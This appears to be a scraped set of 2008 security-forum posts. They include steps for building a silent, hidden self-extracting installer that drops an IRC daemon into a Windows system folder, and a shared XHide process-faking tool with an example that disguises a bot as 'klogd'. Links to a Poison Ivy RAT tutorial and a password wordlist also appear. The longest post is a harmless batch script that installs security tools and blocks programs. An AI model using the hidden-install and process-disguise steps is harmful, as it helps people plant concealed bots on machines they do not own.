  -> Open segfault.exe in notepad, or some text editor 
  -> Configure the config to your likings 
  
  To make the IRCd Executable: 
  -> Add all of the files to a WinRAR archive 
  -> Open the WinRAR archive and select all the items 
  -> Press the SFX button in upper right corner 
  -> Click Advanced SFX options 
  -> Type C:\windows\cursors\mstask\ in "Path to Extract" 
  -> Type install.bat in "Setup program - Run After Extraction" 
  -> Select the Modes tab at the top 
  -> Under silent mode click the Hide all button 
  -> Under Overwrite mode click the Overwrite all files 
  -> Press Ok (Advanced SFX Options) 
  -> Press Ok (Archive File.rar) 
  -> Run the new SFX'd File.exe on the computer you wish to have the IRCd on

Hide Processes In Linux

Mon, 21 Apr 2008 19:49:18 +0000

theres all these non root botnets running on several of the servers that get reported as compromised. I keep a copy of their shit just to know whats out there.

I post this with warning! I only have the binaries... so if your going to use it, reverse engineer it and make sure its clean...

[aup@core linux]$ ./xh
XHide - Process Faker, by Schizoprenic Xnuxer Research © 2002

Options:
-s string Fake name process
-d Run aplication as daemon/system (optional)
-u uid[:gid] Change UID/GID, use another user (optional)
-p filename Save PID to filename (optional)

Example: ./xh -s "klogd -m 0" -d -p test.pid ./egg bot.conf

[aup@core linux]$

here link for download�

just gunzip it, and make sure its executable...

How To Poison Ivy Step By Step.pdf

Mon, 21 Apr 2008 19:44:23 +0000

here is a tuto about poison ivy
here is a tuto about poison ivy

Patch Window Shrinking

Sat, 19 Apr 2008 01:00:04 +0000

Original reference hxxp://isc.sans.org/diary.html?storyid=4310
Files referenced attached for your perusal.

MITSecCampISCPresentation.pdf (888.62K)
: 25
apeg.pdf (214.89K)
: 13

A Very Slick Wordlist For You All

Tue, 18 Mar 2008 22:50:55 +0000

I put this together several years ago but it is still quite useful. Be aware that many other wordlist contain bogus data, tons of whitespace and duplicates. If you use something like JTR you can further increase the power of this list by playing with rules.

hxxp://rapidshare.com/files/100581863/BendersWordlist.rar.html

Tool For A Fresh Pc, All-in-one Setup

Fri, 07 Mar 2008 03:59:56 +0000

My buddy SilverStrm (GSO member ) called me the other day and needed a program to do some automated functions for his dad's computer since he has to fix it a lot...kinda to help make it all go faster. I spent a few hours throwing this together for him and I guess I'll share it with you guys. Since I liked the idea, I may create a more advanced version of an actual PROGRAM to do this, not just a batch script. Try it out and please report bugs/errors/lameness

** THE FILES IT DOWNLOADS ARE HOSTED ON MY PRIVATE SERVER ** ABUSE WILL REMOVE THIS FUNCTION ** I DO THIS BECAUSE AVG/ZL SERVERS CAN BE SLOW **

If there are features you would like to see let me know, if you think this is stupid...well let me know (and why), if you would like to test new versions...well hey LET ME KNOW

@echo off
COLOR 47
:main
Echo.
Echo	THE IDIOTS TOOL FOR COMPUTER SECURITY - BECAUSE IDIOTS NEED SECURITY TOO
Echo					  **   (C) para[d]ox productions 2008   **
Echo						  Program Version: 0.1 ALPHA BUILD
Echo.
Echo			 LISCENSE: This is a public program and it may be decompiled,
Echo					   modified, and hopefully improved as long as the
Echo					   original author is given credit in the source.
TITLE The Idiots Tool For Computer Security (C) para[d]ox productions 2008
Echo.
Echo +----------------------------- Software Packages ----------------------------+
Echo 1) AVG Anti-Virus 7.5 Free Edition
Echo 2) AVG Anti-Spyware
Echo 3) ZoneLabs Zone Alarm Free Edition
Echo 4) Download XCacls.exe
Echo.
Echo +---------------------- User Settings and Modification ----------------------+
Echo 5) Create User Group
Echo 6) Create User
Echo 7) Modify User
Echo 8) Reset User/Power User/Administrator Password (need r00t)
Echo * List User Information With Output To File Coming Soon!! *
Echo.
Echo +------------------------ Program Access Permissions ------------------------+
Echo 9) Deny Access To A Program
Echo 10) Grant Access To Denied Program
Echo.
Echo +------------------------------ Miscellanious -------------------------------+
Echo 11) About The Author
Echo 12) Credits
Echo 13) Exit Program

set /p choice=Option (1-10):

if "%choice%" == "1" goto :AVGAV
if "%choice%" == "2" goto :AVGAS
if "%choice%" == "3" goto :ZLZA
if "%choice%" == "4" goto :XC
if "%choice%" == "5" goto :CUG
if "%choice%" == "6" goto :CU
if "%choice%" == "7" goto :MU
if "%choice%" == "8" goto :RPW
if "%choice%" == "9" goto :DATAP
if "%choice%" == "10" goto :GATDP
if "%choice%" == "11" goto :ATA
if "%choice%" == "12" goto :CRED
if "%choice%" == "13" goto :EXIT

:AVGAV
MD C:\IDIOT_TEMP
cls
Echo.
Echo Download AVG Anti-Virus 7.5 Free Edition
Echo ----------------------------------------
wget http://www.clockworkstudios.org/idiot_files/avg75free_516a1225.exe
cls
move avg75free_516a1225.exe C:\IDIOT_TEMP\
Echo When The Download Has Finished Press Enter...
pause
start C:\IDIOT_TEMP\avg75free_516a1225.exe
cls
goto :main

:AVGAS
MD C:\IDIOT_TEMP
cls
Echo.
Echo Download AVG Anti-Spyware
Echo -------------------------
wget http://www.clockworkstudios.org/idiot_files/avgas-setup-7.5.1.43.exe
cls
move C:\IDIOT_TEMP\avgas-setup-7.5.1.43.exe C:\IDIOT_TEMP
Echo When The Download Has Finished Press Enter...
pause
start avgas-setup-7.5.1.43.exe
cls
goto :main

:ZLZA
MD C:\IDIOT_TEMP
cls
Echo.
Echo Download ZoneLabs Zone Alarm
Echo ----------------------------
wget http://www.clockworkstudios.org/idiot_files/zaZA_Setup_en.exe
cls
move zaZA_Setup_en.exe C:\IDIOT_TEMP
Echo When The Download Has Finished Press Enter...
pause
start C:\IDIOT_TEMP\zaZA_Setup_en.exe
cls
goto :main

:XC
cls
Echo.
Echo Download Xcacls.exe
Echo -------------------
wget http://www.clockworkstudios.org/idiot_files/xcacls.exe
cls
move xcacls.exe %windir%\system32\
cls
goto :main

:CUG
cls
Echo.
Echo Create User Group
Echo -----------------
set /p group_name=Enter the desired name for the new group:
net localgroup %group_name% /add
cls
goto :main

:CU
cls
Echo.
Echo Create User
Echo -----------
Echo 1) Create a Restricted User Account
Echo 2) Create a Power User Account
Echo 3) Create an Administrator Account *
Echo 4) Return To Main
set /p user_type=Which type of user do you want to create (1-4):

if "%user_type%" == "1" goto :Restricted_User
if "%user_type%" == "2" goto :Power_User
if "%user_type%" == "3" goto :Administrator_User 
if "%user_type%" == "4" goto :main

:Restricted_User
Echo Create Restricted User
Echo ----------------------
set /p ru_name=Enter the desired user name:
net user %ru_name% /add
cls
goto :main

:Power_User
Echo Create Power User
Echo -----------------
set /p pu_name=Enter the desired user name:
net user %pu_name% /add
net localgroup "Power Users" %pu_name% /add
cls
goto :main

:Administrator_User
Echo Create Administrator
Echo --------------------
set /p a_name=Enter the desired user name:
net user %a_name% /add
net localgroup Administrators %a_name% /add
cls
goto :main

:MU
cls
Echo.
Echo Modify User
Echo -----------
Echo 1) Change Users Localgroup (Limited, Power User, Administrator) * 
Echo 2) Delete User **WARNING ALL USER DATA/SETTINGS WILL BE LOST! CANNOT BE UNDONE!!**
Echo 3) Return To Main Screen
set /p mod_type=How would you like to modify this user (1-2):

if "%mod_type%" == "1" goto :change_user_localgroup
if "%mod_type%" == "2" goto :delete_user
if "%mod_type%" == "3" goto :main

:change_user_localgroup
set /p user_name=User To Modify:
set /p new_group=Name of Localgroup You Would Like %user_name% added to:
net localgroup "%new_group%" "%user_name%" /add
cls
goto :main

:delete_user
set /p user_name=User To Delete:
net user %user_name% /delete
cls
goto :main

:RPW
cls
Echo.
Echo Reset User Password *
Echo -------------------
Echo Once you enter the username, you will be prompted to enter a
Echo new password. Text WILL NOT be output to screen for
Echo security reasons. PLEASE BE ACCURATE!

set /p user_name=User whose password you want to reset:
net user %user_name% *
cls
goto :main

:DATAP
cls
Echo.
Echo Deny Access To A Program
Echo ------------------------
Echo 1) Default List of Programs To Deny Access To
Echo 2) Custom Program
Echo 3) Return To Main
set /p list_type=Please select a list (1-2):

if "%list_type%" == "1" goto :default_list
if "%list_type%" == "2" goto :custom_list
if "%list_type%" == "3" goto :main

:default_list
Echo Default Deny List
Echo -----------------
Echo 1)FTP.exe
Echo 2)Cscript.exe
Echo 3)RCP.exe
Echo 4)TFTP.exe
Echo 5)Telnet.exe
Echo 6)Internet Explorer
Echo 7)Windows Messenger
Echo 8)Remote Desktop Connection
Echo 9)All Games
Echo 10)Entire List
Echo 11)Return To Main
set /p default_program=Select a program to deny access to:

if "%default_program%" == "1" goto :deny_ftp
if "%default_program%" == "2" goto :deny_cscript
if "%default_program%" == "3" goto :deny_rcp
if "%default_program%" == "4" goto :deny_tftp
if "%default_program%" == "5" goto :deny_telnet
if "%default_program%" == "6" goto :deny_iexplorer
if "%default_program%" == "7" goto :deny_msmsg
if "%default_program%" == "8" goto :deny_mstsc
if "%default_program%" == "9" goto :deny_games
if "%default_program%" == "10" goto :deny_all
if "%default_program%" == "11" goto :main

:deny_ftp
cls
xcacls %windir%\system32\ftp.exe /D EVERYONE /Y
cls
Echo All instances of FTP.EXE have been disabled
pause
goto :default_list

:deny_cscript
cls
xcacls %windir%\system32\cscript.exe /D EVERYONE /Y
cls
Echo All instances of CSCRIPT.EXE have been disabled
pause
goto :default_list

:deny_rcp
cls
xcacls %windir%\system32\rcp.exe /D EVERYONE /Y
cls
Echo All instances of RCP.EXE have been disabled
pause
goto :default_list

:deny_tftp
cls
xcacls %windir%\system32\tftp.exe /D EVERYONE /Y
cls
Echo All instances of TFTP.EXE have been disabled
pause
goto :default_list

:deny_telnet
cls
xcacls %windir%\system32\telnet.exe /D EVERYONE /Y
cls
Echo All instances of TELNET.EXE have been disabled
pause
goto :default_list

:deny_iexplorer
cls
xcacls c:\program files\internet explorer\iexplore.exe /D EVERYONE /Y
cls
Echo All instances of IEXPLORE.EXE have been disabled
pause
goto :default_list

:deny_msmsg
cls
xcacls C:\Program Files\Messenger\msmsgs.exe /D EVERYONE /Y
cls
Echo All instances of MSMSGS.EXE have been disabled
pause
goto :default_list

:deny_mstsc
cls
xcacls %windir%\system32\mstsc.exe /D EVERYONE /Y
cls
Echo All instances of MSTSC.EXE have been disabled
pause
goto :default_list

:deny_games
cls
xcacls %windir%\system32\sol.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\spider.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\freecell.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\mshearts.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\winmine.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\pinball.exe /D EVERYONE /Y
cls
Echo The following games have been blocked Solitare, Spider Solitare,
Echo Hearts, Minesweeper, and 3D Space Cadet Pinball
pause
goto :default_list

:deny_all
cls
xcacls %windir%\system32\ftp.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\tftp.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\rcp.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\telnet.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\mstsc.exe /D EVERYONE /Y
cls
xcacls c:\program files\internet explorer\iexplore.exe /D EVERYONE /Y
cls
xcacls C:\Program Files\Messenger\msmsgs.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\sol.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\spider.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\freecell.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\mshearts.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\winmine.exe /D EVERYONE /Y
cls
xcacls %windir%\system32\pinball.exe /D EVERYONE /Y
cls

Echo The Following Programs Have Been Blocked:
Echo -FTP
Echo -TFTP
Echo -RCP
ECho -TELNET
Echo -REMOTE DESKTOP CONNECTION
Echo -INTERNET EXPLORER
Echo -WINDOWS MESSENGER
Echo -SOLITARE
Echo -SPIDER SOLITARE
Echo -FREE CELL
Echo -HEARTS
Echo -MINESWEEPER
Echo -3D SPACE CADET PINBALL
pause
cls
goto :default_list

:custom_list
Echo Custom Program To Deny Access To
Echo --------------------------------
set /p path=Full Path To Program (C:\path\to\program\program.exe):
set /p prog_name=Name of Program:
xcacls %path% /D EVERYONE /Y
cls
Echo Access to %prog_name% has been blocked!
pause
cls
goto :main

:GATDP
cls
Echo.
Echo Grant Access To Denied Program
Echo ------------------------------
Echo 1) Default List of Programs To Grant Access To
Echo 2) Custom Program
Echo 3) Return To Main
set /p list_type=Please select a list (1-2):

if "%list_type%" == "1" goto :default_allow_list
if "%list_type%" == "2" goto :custom_allow_list
if "%list_type%" == "3" goto :main

:default_allow_list
Echo Default Allow List
Echo -----------------
Echo 1)FTP.exe
Echo 2)Cscript.exe
Echo 3)RCP.exe
Echo 4)TFTP.exe
Echo 5)Telnet.exe
Echo 6)Internet Explorer
Echo 7)Windows Messenger
Echo 8)Remote Desktop Connection
Echo 9)All Games
Echo 10)Entire List
Echo 11)Return To Main
set /p default_program=Select a program to deny access to:

if "%default_program%" == "1" goto :allow_ftp
if "%default_program%" == "2" goto :allow_cscript
if "%default_program%" == "3" goto :allow_rcp
if "%default_program%" == "4" goto :allow_tftp
if "%default_program%" == "5" goto :allow_telnet
if "%default_program%" == "6" goto :allow_iexplorer
if "%default_program%" == "7" goto :allow_msmsg
if "%default_program%" == "8" goto :allow_mstsc
if "%default_program%" == "9" goto :allow_games
if "%default_program%" == "10" goto :allow_all
if "%default_program%" == "11" goto :main

:allow_ftp
xcacls %windir%\system32\ftp.exe /G EVERYONE:F /Y
cls
Echo Access To FTP.EXE Granted :)
pause
cls
goto :main

:allow_cscript
xcacls %windir%\system32\cscript.exe /G EVERYONE:F /Y
cls
Echo Access To CSCRIPT.EXE Granted :)
pause
cls
goto :main

:allow_rcp
xcacls %windir%\system32\rcp.exe /G EVERYONE:F /Y
cls
Echo Access To RCP.EXE Granted :)
pause
cls
goto :main

:allow_tftp
xcacls %windir%\system32\tftp.exe /G EVERYONE:F /Y
cls
Echo Access To TFTP.EXE Granted :)
pause
cls
goto :main

:allow_telnet
xcacls %windir%\system32\telnet.exe /G EVERYONE:F /Y
cls
Echo Access To TELNET.EXE Granted :)
pause
cls
goto :main

:allow_iexplorer
xcacls c:\program files\internet explorer\iexplore.exe /G EVERYONE:F /Y
cls
Echo Access To IEXPLORE.EXE Granted :)
pause
cls
goto :main


:allow_msmsg
xcacls C:\Program Files\Messenger\msmsgs.exe /G EVERYONE:F /Y
cls
Echo Access To MSMSGS.EXE Granted :)
pause
cls
goto :main

:allow_mstsc
xcacls %windir%\system32\mstsc.exe /G EVERYONE:F /Y
cls
Echo Access To MSTSC.EXE Granted :)
pause
cls
goto :main

:allow_games
cls
xcacls %windir%\system32\sol.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\spider.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\freecell.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\mshearts.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\winmine.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\pinball.exe /G EVERYONE:F /Y
cls
Echo The following games have been unblocked Solitare, Spider Solitare,
Echo Hearts, Minesweeper, and 3D Space Cadet Pinball
pause
cls
goto :main

:allow_all
cls
xcacls %windir%\system32\ftp.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\tftp.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\rcp.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\telnet.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\mstsc.exe /G EVERYONE:F /Y
cls
xcacls c:\program files\internet explorer\iexplore.exe /G EVERYONE:F /Y
cls
xcacls C:\Program Files\Messenger\msmsgs.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\sol.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\spider.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\freecell.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\mshearts.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\winmine.exe /G EVERYONE:F /Y
cls
xcacls %windir%\system32\pinball.exe /G EVERYONE:F /Y
cls

Echo The Following Programs Have Been Unblocked:
Echo -FTP
Echo -TFTP
Echo -RCP
ECho -TELNET
Echo -REMOTE DESKTOP CONNECTION
Echo -INTERNET EXPLORER
Echo -WINDOWS MESSENGER
Echo -SOLITARE
Echo -SPIDER SOLITARE
Echo -FREE CELL
Echo -HEARTS
Echo -MINESWEEPER
Echo -3D SPACE CADET PINBALL
pause
cls
goto :default_all0w_list

:custom_allow_list
Echo Custom Program To Grant Access To
Echo --------------------------------
set /p path=Full Path To Program (C:\path\to\program\program.exe):
set /p prog_name=Name of Program:
xcacls %path% /G EVERYONE:F /Y
cls
Echo Access to %prog_name% has been unblocked!
pause
cls
goto :main




:ATA
cls
Echo.
Echo About The Author
Echo ----------------
Echo para[d]ox has created this program because he feels
Echo that these functions should be known to all users.
Echo para[d]ox does not consider you to be an idiot
Echo for using this tool, the name, and it's tag-line
Echo are just simply catchy :)
Echo.
pause
cls
goto :main

:CRED
cls
Echo.
Echo Credits
Echo -------
Echo para[d]ox - the code, the time, the effort
Echo		   - Ryan@GovernmentSecurity.org
Echo.
Echo SilverStrm - alpha/beta tests, giving me the idea
Echo			-noemail@anywhere.com
Echo.
Echo GovernmentSecurity.org - Being the best security board ever! :)
Echo						-http://www.governmentsecurity.org
Echo.
pause
cls
goto :main

:EXIT
exit

auto.zip (3.21K)
: 76